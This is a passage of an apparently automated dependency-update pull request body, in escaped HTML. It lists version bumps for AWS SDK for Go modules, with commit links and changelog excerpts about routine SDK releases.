href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.23\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-05-04)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudwatch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/cloudwatch/CHANGELOG.md#v1260-2023-05-04\"\u003ev1.26.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds support for filtering by metric names in CloudWatch Metric Streams.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/configservice\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/configservice/CHANGELOG.md#v1320-2023-05-04\"\u003ev1.32.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated ResourceType enum with new resource types onboarded by AWS Config in April 2023.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/connect/CHANGELOG.md#v1541-2023-05-04\"\u003ev1.54.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Remove unused InvalidParameterException from CreateParticipant API\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ecs/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Documentation update for new error type NamespaceNotFoundException for CreateCluster and UpdateCluster\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1280-2023-05-04\"\u003ev1.28.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for the Suricata REJECT option in midstream exception configurations.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1170-2023-05-04\"\u003ev1.17.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: DescribeDomainNodes: A new API that provides configuration information for nodes part of the domain\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/quicksight/CHANGELOG.md#v1350-2023-05-04\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Topic, Dataset parameters and VPC\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/rekognition/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new attribute FaceOccluded. Additionally, you can now select attributes individually (e.g. [\u0026quot;DEFAULT\u0026quot;, \u0026quot;FACE_OCCLUDED\u0026quot;, \u0026quot;AGE_RANGE\u0026quot;] instead of [\u0026quot;ALL\u0026quot;]), which can reduce response time.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/s3\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/s3/CHANGELOG.md#v1331-2023-05-04\"\u003ev1.33.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Documentation updates for Amazon S3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sagemaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sagemaker/CHANGELOG.md#v1770-2023-05-04\"\u003ev1.77.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: We added support for ml.inf2 and ml.trn1 family of instances on Amazon SageMaker for deploying machine learning (ML) models for Real-time and Asynchronous inference. You can use these instances to achieve high performance at a low cost for generative artificial intelligence (AI) models.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/securityhub\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/securityhub/CHANGELOG.md#v1310-2023-05-04\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Finding History.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sqs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sqs/CHANGELOG.md#v1210-2023-05-04\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release enables customers to call SQS using AWS JSON-1.0 protocol.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-03)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/appsync\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/appsync/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Private API support for AWS AppSync. With Private APIs, you can now create GraphQL APIs that can only be accessed from your Amazon Virtual Private Cloud (\u0026quot;VPC\u0026quot;).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ec2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ec2/CHANGELOG.md#v1960-2023-05-03\"\u003ev1.96.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds an SDK paginator for GetNetworkInsightsAccessScopeAnalysisFindings\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/inspector2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/inspector2/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This feature provides deep inspection for linux based instance\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/iottwinmaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/iottwinmaker/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a field for GetScene API to return error code and message from dependency services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1270-2023-05-03\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Network Firewall now supports policy level HOME_NET variable overrides.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1160-2023-05-03\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Amazon OpenSearch Service adds the option to deploy a domain across multiple Availability Zones, with each AZ containing a complete copy of data and with nodes in one AZ acting as a standby. This option provides 99.99% availability and consistent performance in the event of infrastructure failure.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/wellarchitected\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/wellarchitected/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release deepens integration with AWS Service Catalog AppRegistry to improve workload resource discovery.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-02)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ae835ecd4db83e5aff241520ec643afba522d704\"\u003e\u003ccode\u003eae835ec\u003c/code\u003e\u003c/a\u003e Release 2023-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef7f367760339dbf8f4bb7c81dbb86b1561b3a9e\"\u003e\u003ccode\u003eef7f367\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a62e494fe82709dd82ae4ce6d5a5a6a45287c45a\"\u003e\u003ccode\u003ea62e494\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833592fbe1a37f1cfd8b7b7062473c7cc6a97859\"\u003e\u003ccode\u003e833592f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/829131feddac6a2fa54ea0050ed7d8c97a29cdd7\"\u003e\u003ccode\u003e829131f\u003c/code\u003e\u003c/a\u003e Add SQSCustomizations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2108\"\u003e#2108\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9d08e7dc2f051ac9c83deca2c548c1d4c3373cdb\"\u003e\u003ccode\u003e9d08e7d\u003c/code\u003e\u003c/a\u003e Release 2023-05-03\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cec4d55d05fbd0bddff916f426901097073068a6\"\u003e\u003ccode\u003ecec4d55\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f558c81e77f42988da4fe0d0aee4be0294a50a8b\"\u003e\u003ccode\u003ef558c81\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8d2e554da1d221c2c1a541a78c729a3f564e8849\"\u003e\u003ccode\u003e8d2e554\u003c/code\u003e\u003c/a\u003e Release 2023-05-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/312e442dc8e12c6cb311e8ac5fcb5560eb4bcee1\"\u003e\u003ccode\u003e312e442\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.303.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2517fe9ffa52ed4507b13ccc57efa111b2008750\"\u003e\u003ccode\u003e2517fe9\u003c/code\u003e\u003c/a\u003e Release 2026-05-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b92fcb4c3e3866495ce858576e58e7311c65f417\"\u003e\u003ccode\u003eb92fcb4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c7819484a7bc74c93cc3ec25742a1a99c1f07699\"\u003e\u003ccode\u003ec781948\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/49cfec4f4e0ab068413618037a391141530604c0\"\u003e\u003ccode\u003e49cfec4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/71f1511b45ced10d1e68f9e631dcb37019759e34\"\u003e\u003ccode\u003e71f1511\u003c/code\u003e\u003c/a\u003e Support SHA-256 on CloudFront signing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3406\"\u003e#3406\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f29464eb7d59e0f436636245835fcc40a26908c9\"\u003e\u003ccode\u003ef29464e\u003c/code\u003e\u003c/a\u003e Release 2026-05-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/68ef1d689b9862ca77c2b52bf71d856a61822249\"\u003e\u003ccode\u003e68ef1d6\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/23c837914b0428505996a9c82f9a95afe4755f1d\"\u003e\u003ccode\u003e23c8379\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d417d923addeb7f3b9f17a1105535b37964c1e68\"\u003e\u003ccode\u003ed417d92\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d3db2d08ce74fa0da7d6adf8897272f43b25246d\"\u003e\u003ccode\u003ed3db2d0\u003c/code\u003e\u003c/a\u003e Auto-discover protocoltest instead of manually adding them to build (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3392\"\u003e#3392\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.303.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.57.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bd153c05150d0c3f9d45f5b9353c34df9bab5b5\"\u003e\u003ccode\u003e9bd153c\u003c/code\u003e\u003c/a\u003e Release 2025-03-04.2\u003c/li\u003e\n\u003cli\u003e\u003ca 